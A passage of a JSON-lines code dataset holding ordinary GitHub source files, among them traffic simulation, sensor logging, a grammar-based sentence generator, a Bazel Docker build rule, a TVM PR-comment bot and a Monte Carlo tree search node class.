linea, procesando la cabecera de seccion, la linea de titulos y los datos\n fichero = codecs.open(file_name,'r','utf_8')\n \n lineas = fichero.readlines()\n for linea in lineas:\n valores = linea.replace('\"','').split(',')\n registro_benckmark = Benchmark(computer,fecha,valores[0],valores[1] )\n session.add(registro_benckmark)\n\n session.commit()\n session.close()\n\n session = Session()\n\n #Actualizamos la tabla de modelos de discos por si ha entrado alguno nuevo\n Diskmodel.actualizar_diskmodel(engine.connect())\n\n session.commit()\n session.close()\n\n exportar('../InformeHW.xlsx')","repo_name":"ignasilm/pyinformehw","sub_path":"pyinformehw/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4763,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"30318569469","text":"import numpy as np\nData=np.loadtxt('monthrg.dat')\nAno=Data[:,0]\nMes=Data[:,1]\nDias=Data[:,2]\nManchas=Data[:,3]\nindex= Dias>0\nManchas=Manchas[index]\ntiempo=Ano[index] + (Mes[index]/12.0)\nX=np.array([tiempo,Manchas])\nX=np.transpose(X)\nnp.savetxt('fecha_mancha.dat',X)\n","repo_name":"Switchfools/Metodos","sub_path":"procesa.py","file_name":"procesa.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"8325264125","text":"from datetime import timedelta\nfrom dateutil.parser import parse\n\n\ndef cache(data_src_records, pk, subkey):\n cached_events = {}\n for record in data_src_records:\n key = getattr(record, pk) # Connect to c_call table\n event_id = getattr(record, subkey) # Organize events\n cached_event = cached_events.get(\n key,\n { # This could be a configobj from AppSettings \"Call Template\"\n 'Start Time': None, # MIN time\n 'End Time': None, # MAX time\n 'Unique Id1': None, # Hunt Group from c_call table\n 'Unique Id2': None, # Hunt Group from c_call table\n 'Events': {},\n 'Event Summary': {}\n }\n )\n\n # Unique ID from query\n if not cached_event['Unique Id1']: # Set if none\n cached_event['Unique Id1'] = getattr(record, 'dialed_party_number')\n\n if not cached_event['Unique Id2']: # Set if none\n cached_event['Unique Id2'] = getattr(record, 'calling_party_number')\n\n # MIN start time\n if not cached_event['Start Time']: # Set if none\n cached_event['Start Time'] = getattr(record, 'start_time')\n elif cached_event['Start Time'] > getattr(record, 'start_time'): # or with a new lowest start_time\n cached_event['Start Time'] = getattr(record, 'start_time')\n\n # MAX end time\n if not cached_event['End Time']: # Set if none\n cached_event['End Time'] = getattr(record, 'end_time')\n elif cached_event['End Time'] < getattr(record, 'end_time'): # or with a new highest end_time\n cached_event['End Time'] = getattr(record, 'end_time')\n\n cached_event['Events'][event_id] = record # Preserve event order / Serialization breaks\n\n # Create a summary of the event_types\n event_accum = cached_event['Event Summary'].get(\n getattr(record, 'event_type'),\n timedelta(0)\n )\n try:\n event_accum += getattr(record, 'end_time') - getattr(record, 'start_time')\n except TypeError:\n pass\n # print(record['end_time'], type(record['end_time']))\n # print(record['start_time'], type(record['start_time']))\n cached_event['Event Summary'][getattr(record, 'event_type')] = event_accum\n # print(cached_event['Start Time'], type(cached_event['Start Time']))\n cached_events[key] = cached_event\n # print([values['Event Summary'].keys() for cache, values in cached_events.items()])\n # print([values['Event Summary'].get(4, None) for cache, values in cached_events.items()])\n return cached_events\n","repo_name":"michaelscales88/falcon_reporting","sub_path":"app/report/src/sla_cache.py","file_name":"sla_cache.py","file_ext":"py","file_size_in_byte":2677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"18465864565","text":"'''\n作业. 1.设计你自己的句子生成器\n3. 获得最优质的的语言\nQ: 这个模型有什么问题? 你准备如何提升?\n\nAns:\n'''\nimport random\nfrom ngram import get_p\nchoice = random.choice\ndef create_grammar(grammar_str, split='=', line_split='\\n'):\n grammar = {}\n for line in grammar_str.split(line_split):\n if not line.strip(): continue\n exp, stmt = line.split(split)\n grammar[exp.strip()] = [s.split() for s in stmt.split('|')]\n return grammar\n\ndef generate(gram, target):\n if target not in gram: return target # means target is a terminal expression\n expaned = [generate(gram, t) for t in choice(gram[target])]\n return ''.join([e if e != '/n' else '\\n' for e in expaned if e != 'null'])\nnpc=\"\"\"\ndoctor = 确认患者名字 询问情况 询问不适部位 探究原因\n确认患者名字 = 称呼 确认 名字 结尾 标点\n称呼 = 你 | 您 \n确认 = 是 | 叫 | 名字是 | 名字叫 | 的名字是 | 就是\n名字 = 王小二 | 张三 | 李四 | 王五\n结尾 = 吗 | 吧 | 啊\n\n询问情况 = 称呼 怎么回事 标点\n称呼 = 你|您\n怎么回事 = 怎么啦 | 是什么情况啊 | 说说你的情况吧 | 跟我说一下你的情况\n标点 = ?| ! | ,\n\n询问不适部位 = 阐述 你 部位 伤痛 标点\n阐述 = 说一说 | 讲一讲 | 说一下 | 告诉我 | 跟我说 \n部位 = 哪里 | 哪个地方 | 哪个部位 | 什么位置\n伤痛 = 不舒服 | 不适 | 疼 | 痛 | 不对劲 | 难受 | 疼痛 \n\n探究原因 = 我会根据您的病情进行治疗 | 我给你开点药 | 我给你扎一针 | 我帮你治疗\n\"\"\"\n\nnpc_1=\"\"\"\nintro = 人称 问候 推销商品\n人称 = 先生 | 小姐 | 姑娘 | 夫人 | 太太 \n问候 = 您好 | 你好 \n推销商品 = 展示 商品 介绍优点 \n展示 = 您看一下 | 给您看一下 | 请看一下 | 您看\n商品 = 代指 是不是 修饰 物\n代指 = 这个 | 这 | 这些 | 那些 | 那\n是不是 = 是 | 就是 \n修饰 = 厂商 产生\n厂商 = 阿里巴巴 | 百度 | 微软 | 腾讯 | 苹果公司 | 华为 | 小米\n产生 = 开发的 | 创造的 | 做出来的 | 做的\n物 = app | 软件 | 操作系统 | 一套算法 | 智能机器人\n介绍优点 = 史无前例 | 非常棒 | 效果很好 \n\"\"\"\ndef generate_n():\n for i in range(20):\n print(generate(create_grammar(npc), target=\"doctor\"))\n print(generate(create_grammar(npc_1), target=\"intro\"))\ndef generate_best(gram,target):\n sendict={}\n for i in range(20):\n sen=generate(create_grammar(gram), target=target)\n sendict[sen]=get_p(sen)\n return sorted(sendict.items(),key=lambda x:x[1])[-1][0]\n\nif __name__==\"__main__\":\n generate_n()\n print(generate_best(npc,\"doctor\"))\n","repo_name":"aizhizhe/lcl_home","sub_path":"homework_1/code for practice part/npc.py","file_name":"npc.py","file_ext":"py","file_size_in_byte":2700,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"71640959901","text":"from typing import Dict\n\nfrom odd_models.models import DataEntity, DataEntityGroup, DataEntityType\nfrom oddrn_generator.generators import PrestoGenerator\n\n\ndef map_schema(\n oddrn_generator: PrestoGenerator,\n schema_node_name: str,\n tables_node: Dict[str, dict],\n) -> DataEntity:\n return DataEntity(\n oddrn=oddrn_generator.get_oddrn_by_path(\"schemas\", schema_node_name),\n name=schema_node_name,\n type=DataEntityType.DATABASE_SERVICE,\n metadata=[],\n data_entity_group=DataEntityGroup(\n entities_list=[\n oddrn_generator.get_oddrn_by_path(\"tables\", table_node_name)\n for table_node_name in tables_node.keys()\n ]\n ),\n )\n","repo_name":"opendatadiscovery/odd-collectors","sub_path":"odd-collector/odd_collector/adapters/presto/mappers/schemas.py","file_name":"schemas.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"13129254311","text":"\"\"\"Base environment for the Bay Bridge.\"\"\"\nimport numpy as np\nfrom collections import defaultdict\n\nfrom flow.envs import Env\n\nEDGE_LIST = [\n '11198593', '236348360#1', '157598960', '11415208', '236348361',\n '11198599', '35536683', '11198595.0', '11198595.656.0', \"gneE5\",\n '340686911#3', '23874736', '119057701', '517934789', '236348364',\n '124952171', \"gneE0\", \"11198599\", \"124952182.0\", '236348360#0',\n '497579295', '340686911#2.0', '340686911#1', '394443191', '322962944',\n \"32661309#1.0\", \"90077193#1.777\", \"90077193#1.0\", \"90077193#1.812\",\n \"gneE1\", \"183343422\", \"393649534\", \"32661316\", \"4757680\", \"124952179\",\n \"11189946\", \"119058993\", \"28413679\", \"11197898\", \"123741311\", \"123741303\",\n \"90077193#0\", \"28413687#0\", \"28413687#1\", \"11197889\", \"123741382#0\",\n \"123741382#1\", \"gneE3\", \"340686911#0.54.0\", \"340686911#0.54.54.0\",\n \"340686911#0.54.54.127.0\", \"340686911#2.35\"\n]\n\nMAX_LANES = 24\nNUM_EDGES = len(EDGE_LIST)\nOBS_SPACE = 4 + 2 * NUM_EDGES + 4 * MAX_LANES\nNUM_TRAFFIC_LIGHTS = 14\n\n# number of vehicles a traffic light can observe in each lane\nNUM_OBSERVED = 10\nEDGE_BEFORE_TOLL = \"gneE3\"\nTB_TL_ID = \"gneJ4\"\nEDGE_AFTER_TOLL = \"340686911#0.54.0\"\nNUM_TOLL_LANES = 20\nTOLL_BOOTH_AREA = 100\n\nEDGE_BEFORE_RAMP_METER = \"340686911#0.54.54.0\"\nEDGE_AFTER_RAMP_METER = \"340686911#0.54.54.127.0\"\nNUM_RAMP_METERS = 14\nRAMP_METER_AREA = 80\n\nMEAN_SECONDS_WAIT_AT_FAST_TRACK = 3\nMEAN_SECONDS_WAIT_AT_TOLL = 15\nFAST_TRACK_ON = range(6, 11)\n\n\nclass BayBridgeEnv(Env):\n \"\"\"Base environment class for Bay Bridge networks.\n\n This class is responsible for mimicking the effects of the\n\n States\n No observations are issued by this class (i.e. empty list).\n\n Actions\n No actions are issued by this class.\n\n Rewards\n The reward is the average speed of vehicles in the network\n (temporarily).\n\n Termination\n A rollout is terminated if the time horizon is reached or if two\n vehicles collide into one another.\n \"\"\"\n\n def __init__(self, env_params, sim_params, network, simulator='traci'):\n super().__init__(env_params, sim_params, network, simulator)\n self.edge_dict = defaultdict(list)\n self.cars_waiting_for_toll = dict()\n self.cars_before_ramp = dict()\n self.toll_wait_time = np.abs(\n np.random.normal(MEAN_SECONDS_WAIT_AT_TOLL / self.sim_step,\n 4 / self.sim_step, NUM_TOLL_LANES))\n self.tl_state = \"\"\n self.disable_tb = False\n self.disable_ramp_metering = False\n\n if \"disable_tb\" in env_params.additional_params:\n self.disable_tb = env_params.get_additional_param(\"disable_tb\")\n\n if \"disable_ramp_metering\" in env_params.additional_params:\n self.disable_ramp_metering = env_params.get_additional_param(\n \"disable_ramp_metering\")\n\n def additional_command(self):\n \"\"\"See parent class.\n\n This methods add traffic light and ramp metering control to the\n environment.\n \"\"\"\n super().additional_command()\n # build a list of vehicles and their edges and positions\n self.edge_dict = defaultdict(list)\n # update the dict with all the edges in edge_list so we can look\n # forward for edges\n self.edge_dict.update(\n (k, [[] for _ in range(MAX_LANES)]) for k in EDGE_LIST)\n for veh_id in self.k.vehicle.get_ids():\n edge = self.k.vehicle.get_edge(veh_id)\n if edge not in self.edge_dict:\n self.edge_dict.update({edge: [[] for _ in range(MAX_LANES)]})\n lane = self.k.vehicle.get_lane(veh_id) # integer\n pos = self.k.vehicle.get_position(veh_id)\n\n # perform necessary lane change actions to keep vehicle in the\n # right route\n self.edge_dict[edge][lane].append((veh_id, pos))\n if edge == \"124952171\" and lane == 1:\n self.k.vehicle.apply_lane_change([veh_id], direction=[1])\n\n if not self.disable_tb:\n self.apply_toll_bridge_control()\n if not self.disable_ramp_metering:\n self.ramp_meter_lane_change_control()\n\n def ramp_meter_lane_change_control(self):\n \"\"\"Control the lane changing behavior.\n\n Specify/Toggle the lane changing behavior of the vehicles depending on\n factors like whether or not they are before the toll.\n \"\"\"\n cars_that_have_left = []\n for veh_id in self.cars_before_ramp:\n if self.k.vehicle.get_edge(veh_id) == EDGE_AFTER_RAMP_METER:\n if self.simulator == 'traci':\n lane_change_mode = self.cars_before_ramp[veh_id][\n 'lane_change_mode']\n self.k.kernel_api.vehicle.setLaneChangeMode(\n veh_id, lane_change_mode)\n color = self.cars_before_ramp[veh_id]['color']\n self.k.vehicle.set_color(veh_id, color)\n\n cars_that_have_left.append(veh_id)\n\n for veh_id in cars_that_have_left:\n self.cars_before_ramp.__delitem__(veh_id)\n\n for lane in range(NUM_RAMP_METERS):\n cars_in_lane = self.edge_dict[EDGE_BEFORE_RAMP_METER][lane]\n\n for car in cars_in_lane:\n veh_id, pos = car\n if pos > RAMP_METER_AREA:\n if veh_id not in self.cars_waiting_for_toll:\n if self.simulator == 'traci':\n # Disable lane changes inside Toll Area\n lane_change_mode = self.k.kernel_api.vehicle.\\\n getLaneChangeMode(veh_id)\n self.k.kernel_api.vehicle.setLaneChangeMode(\n veh_id, 512)\n else:\n lane_change_mode = None\n color = self.k.vehicle.get_color(veh_id)\n self.k.vehicle.set_color(veh_id, (0, 255, 255))\n self.cars_before_ramp[veh_id] = {\n \"lane_change_mode\": lane_change_mode,\n \"color\": color\n }\n\n def apply_toll_bridge_control(self):\n \"\"\"Apply control to the toll bridge.\"\"\"\n cars_that_have_left = []\n for veh_id in self.cars_waiting_for_toll:\n if self.k.vehicle.get_edge(veh_id) == EDGE_AFTER_TOLL:\n lane = self.k.vehicle.get_lane(veh_id)\n if self.simulator == 'traci':\n lane_change_mode = \\\n self.cars_waiting_for_toll[veh_id][\"lane_change_mode\"]\n self.k.kernel_api.vehicle.setLaneChangeMode(\n veh_id, lane_change_mode)\n color = self.cars_waiting_for_toll[veh_id][\"color\"]\n self.k.vehicle.set_color(veh_id, color)\n if lane not in FAST_TRACK_ON:\n self.toll_wait_time[lane] = max(\n 0,\n np.random.normal(\n loc=MEAN_SECONDS_WAIT_AT_TOLL / self.sim_step,\n scale=1 / self.sim_step))\n else:\n self.toll_wait_time[lane] = max(\n 0,\n np.random.normal(\n loc=MEAN_SECONDS_WAIT_AT_FAST_TRACK /\n self.sim_step,\n scale=1 / self.sim_step))\n\n cars_that_have_left.append(veh_id)\n\n for veh_id in cars_that_have_left:\n self.cars_waiting_for_toll.__delitem__(veh_id)\n\n traffic_light_states = [\"G\"] * NUM_TOLL_LANES\n\n for lane in range(NUM_TOLL_LANES):\n cars_in_lane = self.edge_dict[EDGE_BEFORE_TOLL][lane]\n\n for car in cars_in_lane:\n veh_id, pos = car\n if pos > TOLL_BOOTH_AREA:\n if veh_id not in self.cars_waiting_for_toll:\n if self.simulator == 'traci':\n # Disable lane changes inside Toll Area\n lc_mode = self.k.kernel_api.vehicle.\\\n getLaneChangeMode(veh_id)\n self.k.kernel_api.vehicle.setLaneChangeMode(\n veh_id, 512)\n else:\n lc_mode = None\n color = self.k.vehicle.get_color(veh_id)\n self.k.vehicle.set_color(veh_id, (255, 0, 255))\n self.cars_waiting_for_toll[veh_id] = {\n \"lane_change_mode\": lc_mode,\n \"color\": color\n }\n else:\n if pos > 120:\n if self.toll_wait_time[lane] < 0:\n traffic_light_states[lane] = \"G\"\n else:\n traffic_light_states[lane] = \"r\"\n self.toll_wait_time[lane] -= 1\n\n new_tls_state = \"\".join(traffic_light_states)\n\n if new_tls_state != self.tl_state:\n self.tl_state = new_tls_state\n self.k.traffic_light.set_state(\n node_id=TB_TL_ID, state=new_tls_state)\n\n # TODO: decide on a good reward function\n def compute_reward(self, rl_actions, **kwargs):\n \"\"\"See class definition.\"\"\"\n return np.mean(self.k.vehicle.get_speed(self.k.vehicle.get_ids()))\n\n ###########################################################################\n # The below methods need to be updated by child classes. #\n ###########################################################################\n\n @property\n def action_space(self):\n \"\"\"See parent class.\n\n To be implemented by child classes.\n \"\"\"\n pass\n\n @property\n def observation_space(self):\n \"\"\"See parent class.\n\n To be implemented by child classes.\n \"\"\"\n pass\n\n def _apply_rl_actions(self, rl_actions):\n \"\"\"See parent class.\n\n To be implemented by child classes.\n \"\"\"\n pass\n\n def get_state(self):\n \"\"\"See parent class.\n\n To be implemented by child classes.\n \"\"\"\n return []\n","repo_name":"flow-project/flow","sub_path":"flow/envs/bay_bridge.py","file_name":"bay_bridge.py","file_ext":"py","file_size_in_byte":10368,"program_lang":"python","lang":"en","doc_type":"code","stars":978,"dataset":"github-code","pt":"69"}
+{"seq_id":"2047414522","text":"print('''\\nQ5: to randomly shuffle the elements of 2D list \nand write it back to the file with that particular order.\\n. ''')\nimport random\ndef shuffle2DList(filename):\n\tmainlist = [] \t# A list to store content of file\n\tfile = open(filename,'r')\t# open file in read mode\n\tF = file.read().splitlines()\n\tindex = 0\t#to count the elements\n\tfor i in range(0,3):\t# reading every line \n\t\tl = []\n\t\tfor j in range(0,4):\n\t\t\tl.append(int(F[index]))\t #insert each line in List\n\t\t\tindex += 1\n\t\tmainlist.append(l)\n\tfile.close()\n\tprint(\"File content BEFORE shuffling the numbers: \\n\")\n\tfor rows in mainlist:\n\t\tfor columns in rows:\n\t\t\tprint(columns, end= ' ')\n\t\tprint('')\n\n\tprint(\"\\nFile content AFTER shuffling the numbers: \\n\")\n\trandom.shuffle(mainlist)\t# randomly shuffle the list\n\tfor rows in mainlist:\n\t\tfor columns in rows:\n\t\t\tprint(columns, end= ' ')\n\t\tprint('')\n\n\tfile = open(filename,'w')\t# open file in read mode\n\tfor rows in range(0,3):\t# reading every line \n\t\tfor columns in range(0,4):\n\t\t\tfile.write(str(mainlist[rows][columns])+'\\n')\n\tfile.close()\n \nshuffle2DList('q5.txt')\n","repo_name":"mohamedkharma/side-projects","sub_path":"Python/randomlyShuffle2dList.py","file_name":"randomlyShuffle2dList.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"71181051100","text":"\"\"\"\nDependencies:\n\n- OpenCV >= 2.4.4\n\"\"\"\n\nimport sys\n\nimport numpy as np\nimport cv2\n\n\nDEBUG = True\n\n\n# http://stackoverflow.com/questions/10948589/choosing-correct-hsv-values-for-opencv-thresholding-with-inranges\n\n# The HSV value range that is used to get green color of the image\nGREEN_RANGE_MIN = np.array([50, 70, 70], np.uint8)\nGREEN_RANGE_MAX = np.array([75, 255, 255], np.uint8)\n\n\ndef find_color(image, min_hsv, max_hsv):\n \"\"\"Returns black and white image where green color is white.\"\"\"\n hsv_image = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)\n return cv2.inRange(hsv_image, min_hsv, max_hsv)\n\n\ndef color_range_to_transparent(image, min_hsv, max_hsv):\n \"\"\"Returns image where HSV color range is converted to transparent.\n\n image: OpenCV format image\n min: Minimum HSV value as np.array\n max: Maximum HSV value as np.array\n \"\"\"\n bw_image = find_color(image, min_hsv, max_hsv)\n\n if DEBUG:\n cv2.imwrite('debug.jpg', bw_image)\n\n # Find the matching pixels\n non_zero_pixels = cv2.findNonZero(bw_image)\n\n # Add alpha channel to new image\n new_image = cv2.cvtColor(image.copy(), cv2.COLOR_BGR2BGRA)\n\n for pixel in non_zero_pixels:\n x, y = pixel[0][1], pixel[0][0]\n new_image[x][y] = np.array([0, 0, 0, 0], np.uint8)\n\n cv2.imwrite('new.png', new_image)\n\n\ndef main():\n file_name = sys.argv[1]\n image = cv2.imread(file_name)\n new_image = color_range_to_transparent(image, GREEN_RANGE_MIN,\n GREEN_RANGE_MAX)\n\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"kimmobrunfeldt/random_python_utils","sub_path":"color_to_transparent.py","file_name":"color_to_transparent.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"86707464565","text":"#-*- coding:utf-8 -*-\nimport unittest\nimport yaml\nfrom source.utilities.mclang import mclang_to_dict\nfrom source.utilities.splitter import dict_split\n\n\nclass TestSplitter(unittest.TestCase):\n\n def test_splitter(self):\n\n lang_file = open('test/test3.lang', 'r', encoding='utf-8')\n lang = mclang_to_dict(lang_file, lambda x: x.strip().startswith('S:'))\n\n config_file = open('config/division.yml', 'r', encoding='utf-8')\n config = yaml.load(config_file)\n\n test_result = dict_split(lang, config)\n test_ans = {'tooltip': {'S:gt.tooltip.blah': 'blah tooltip', 'S:gt.multiitem.blaah.tooltip': 'blaah tooltip'},\n 'gt_multiitem': {'S:gt.multiitem.blaah.name': 'blaah'}, 'misc': {'S:enchantment.blaaah': 'enchantment blaaah'}}\n\n self.assertDictEqual(test_result, test_ans)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"TeamNED/gregtech6-chinese-translation","sub_path":"test/test3.py","file_name":"test3.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"69"}
+{"seq_id":"42102399600","text":"def docker_build_impl(ctx):\n args = []\n if not ctx.attr.use_cache:\n args += ['--force-rm', '--no-cache']\n cmd = '\\n'.join([\n \"set -e\",\n \"rm -rf _docker_ctx\",\n \"mkdir _docker_ctx\",\n \"srcs=(%s)\" % (cmd_helper.join_paths(\" \", set(ctx.files.data))),\n \"for src in ${srcs[@]}; do\",\n \" dir=$(dirname $src)\",\n \" dir=${dir#%s}\" % (ctx.configuration.bin_dir.path),\n \" dir=${dir#%s}\" % (ctx.configuration.genfiles_dir.path),\n \" mkdir -p _docker_ctx/$dir\",\n \" cp -L --preserve=all $src _docker_ctx/$dir\",\n \"done\",\n \"cp %s _docker_ctx\" % (ctx.file.src.path),\n \"cd _docker_ctx\",\n \"docker build -t %s %s .\" % (ctx.attr.image_name, ' '.join(args)),\n \"touch ../\" + ctx.outputs.done_marker.path,\n ])\n ctx.action(\n inputs = [ctx.file.src] + ctx.files.deps + ctx.files.data,\n outputs = [ctx.outputs.done_marker],\n mnemonic = 'DockerBuild',\n command = cmd,\n use_default_shell_env = True)\n\n return struct(dockerfile = ctx.file.src)\n\ndocker_build = rule(\n docker_build_impl,\n attrs = {\n \"src\": attr.label(\n allow_files = True,\n single_file = True,\n ),\n \"image_name\": attr.string(),\n \"data\": attr.label_list(allow_files = True),\n \"deps\": attr.label_list(\n providers = [\"dockerfile\"],\n ),\n \"use_cache\": attr.bool(),\n },\n outputs = {\"done_marker\": \"%{name}.done\"},\n)\n","repo_name":"google/shipshape","sub_path":"tools/build_rules/docker.bzl","file_name":"docker.bzl","file_ext":"bzl","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","stars":266,"dataset":"github-code","pt":"69"}
+{"seq_id":"4376368225","text":"import Adafruit_DHT as dht\nimport requests\nfrom dotenv import dotenv_values\nimport asyncio\n\nconfig = dotenv_values(\"../.env\")\nurl = config[\"URL\"]\nuuid = config[\"UUID\"]\n\nasync def main():\n print(\"starting...\")\n while True:\n humidity, temperature = dht.read_retry(dht.DHT22, 4, delay_seconds=5)\n humidity = round(humidity, 2)\n temperature = round(temperature, 2)\n print(f\"temp={temperature:0.2f} humi={humidity:0.2f}\")\n\n res = requests.post(\n url=url,\n json={\n \"uuid\": uuid,\n \"temperature\": temperature,\n \"humidity\": humidity,\n },\n )\n\n if res.status_code != 200:\n print(res.status_code)\n print(res.text)\n \n await asyncio.sleep(60)\n\nif __name__ == \"__main__\":\n asyncio.run(main())\n","repo_name":"noname2048/cj-rasp","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"26379328013","text":"# Problem 2\r\n\r\n# Find the sum of all the even-valued terms in the\r\n# Fibonacci sequence which do not exceed four million.\r\n\r\ni = 1\r\nj = 0\r\nfib = [1, 2]\r\nfib_even = [2]\r\n\r\nwhile fib[i] <= 4000000:\r\n j = fib[i] + fib[i-1]\r\n if j <= 4000000:\r\n fib.append(j)\r\n if j%2 == 0:\r\n fib_even.append(j)\r\n else:\r\n break\r\n \r\n i += 1\r\n \r\n\r\nprint(fib)\r\nprint(fib_even)\r\nprint(sum(fib_even))\r\n \r\n\r\n\r\n\r\n","repo_name":"parrott-kevin/project-euler","sub_path":"python/problem_02.py","file_name":"problem_02.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"29659799218","text":"import os\nimport logging\nfrom typing import Dict, Any, Optional, List\n\nfrom .git_utils import GitHubRepo, DRY_RUN\nfrom .github_commenter import BotCommentBuilder, Item\nfrom .github_skipped_tests_comment import get_skipped_tests_comment\nfrom .github_tag_teams import get_tags\nfrom .github_docs_comment import get_doc_url\nfrom .ci_runtime import ci_runtime_comment\n\nPR_QUERY = \"\"\"\n query ($owner: String!, $name: String!, $number: Int!) {\n repository(owner: $owner, name: $name) {\n pullRequest(number: $number) {\n title\n body\n state\n isDraft\n number\n baseRefOid\n author {\n login\n }\n labels(first:100) {\n nodes {\n name\n }\n }\n comments(last: 100) {\n pageInfo {\n hasPreviousPage\n }\n nodes {\n author {\n login\n }\n databaseId\n body\n }\n }\n commits(last: 1) {\n nodes {\n commit {\n oid\n statusCheckRollup {\n contexts(first: 100) {\n pageInfo {\n hasNextPage\n }\n nodes {\n ... on StatusContext {\n state\n context\n targetUrl\n }\n }\n }\n }\n }\n }\n }\n }\n }\n }\n\"\"\"\n\n\n# TODO: These are all disabled for now, as they get ported over to lambda we can\n# turn them back on\nCOMMENT_SECTIONS = {\n \"ccs\": lambda pr_data, github: get_tags(pr_data, github, team_issue=10317),\n \"skipped-tests\": lambda pr_data, github: get_skipped_tests_comment(\n pr_data, github=github\n ),\n \"docs\": lambda pr_data, github: get_doc_url(pr_data),\n \"runtime\": lambda pr_data, github: ci_runtime_comment(pr_data, github),\n}\n\n\ndef github_pr_comment(\n webhook_pr_data: Dict[str, Any],\n user: str,\n repo: str,\n dry_run: bool,\n commenters: Optional[List[str]] = None,\n):\n logger = logging.getLogger(\"py-github\")\n test_data = None\n github = GitHubRepo(\n user=user,\n repo=repo,\n token=DRY_RUN if dry_run else os.environ[\"GITHUB_TOKEN\"],\n test_data=test_data,\n )\n logger.info(f\"Generated github: {github}\")\n\n pr_data = github.graphql(\n PR_QUERY,\n {\n \"owner\": user,\n \"name\": repo,\n \"number\": webhook_pr_data[\"number\"],\n },\n )\n\n pr_data = pr_data[\"data\"][\"repository\"][\"pullRequest\"]\n commenter = BotCommentBuilder(github=github, data=pr_data)\n\n items = {}\n for key, generator in COMMENT_SECTIONS.items():\n if commenters is not None and key not in commenters:\n continue\n\n logging.info(f\"Processing commenter: {key}\")\n # Don't re-fetch items that have declared themselves done\n if not commenter.is_done(key):\n try:\n _, content = generator(pr_data, github)\n items[key] = Item(key=key, text=content, is_done=False)\n except Exception as e:\n logger.exception(e)\n\n logger.info(f\"Commenting {len(items)} items: {items}\")\n commenter.post_items(items=list(items.values()))\n","repo_name":"tlc-pack/ci","sub_path":"terraform/tvm_bot/tvm_bot/github_pr_comment.py","file_name":"github_pr_comment.py","file_ext":"py","file_size_in_byte":3425,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"69"}
+{"seq_id":"11843746302","text":"from setuptools import setup, find_packages\nimport os\nimport sys\n\n\nif sys.version_info[0] < 3:\n with open('README.md') as f:\n long_description = f.read()\nelse:\n with open('README.md', encoding='utf-8') as f:\n long_description = f.read()\n\nwith(open(\"version.txt\", \"r\")) as f:\n version = f.read()\n\nwith(open(\"requirements.txt\", \"r\")) as f:\n requirements = f.read()\n\n\nsetup(\n name='effcossim',\n version=version,\n description='Efficient Pairwise Cosine Similarity Computation',\n long_description=long_description,\n long_description_content_type='text/markdown',\n author='ngshya',\n author_email='ngshya@gmail.com',\n url='https://github.com/ngshya/effcossim',\n license='GPLv3',\n packages=find_packages(exclude=[\"tests\"]),\n install_requires=requirements,\n include_package_data=True,\n)","repo_name":"ngshya/effcossim","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"39234504448","text":"\nimport numpy as np\n\nfrom collections import defaultdict\n\nfrom lib.mcts.utils.factory import safe_deepcopy_env\n\n\nclass Node(object):\n \"\"\"A tree node.\n \"\"\"\n\n def __init__(self, parent, planner):\n \"\"\"New node.\n\n :param parent: its parent node\n :param planner: the planner using the node\n\n Parameters\n ----------\n parent : Node\n Its parent node.\n planner : AbstractPlanner\n The planner using the node.\n \"\"\"\n\n self.parent = parent\n self.planner = planner\n\n # Dict of children nodes, indexed by action labels.\n self.children = {}\n\n # Number of times the node was visited.\n self.count = 0\n\n def get_value(self) -> float:\n \"\"\"Evaluate the node return.\n\n Returns\n -------\n float\n An estimate of the node value.\n\n Raises\n ------\n NotImplementedError\n This function is abstract and must be defined separately \n in each agent that inherits this class.\n \"\"\"\n raise NotImplementedError()\n\n def expand(self, branching_factor):\n \"\"\"Expand the node and discover children.\n\n Parameters\n ----------\n branching_factor : int\n The number of the node's children.\n \"\"\"\n for a in range(branching_factor):\n self.children[a] = type(self)(self, self.planner)\n\n def selection_rule(self):\n \"\"\"A selection criterion.\n\n Raises\n ------\n NotImplementedError\n This function is abstract and must be defined separately \n in each agent that inherits this class.\n \"\"\"\n raise NotImplementedError()\n\n @staticmethod\n def breadth_first_search(root, operator=None, condition=None, condition_blocking=True):\n \"\"\"Breadth-first search of all paths to nodes that meet a given condition.\n\n Parameters\n ----------\n root : Node\n Starting node.\n operator : bool, optional\n Will be applied to all traversed nodes, by default None\n condition : function, optional\n Nodes meeting that condition will be returned, by default None\n condition_blocking : bool, optional\n Do not explore a node which met the condition, by default True\n\n Yields\n ------\n List\n List of paths to nodes that met the condition.\n \"\"\"\n queue = [(root, [])]\n while queue:\n (node, path) = queue.pop(0)\n if (condition is None) or condition(node):\n returned = operator(node, path) if operator else (node, path)\n yield returned\n if (condition is None) or not condition_blocking or not condition(node):\n for next_key, next_node in node.children.items():\n queue.append((next_node, path + [next_key]))\n\n def is_leaf(self):\n return not self.children\n\n def path(self):\n 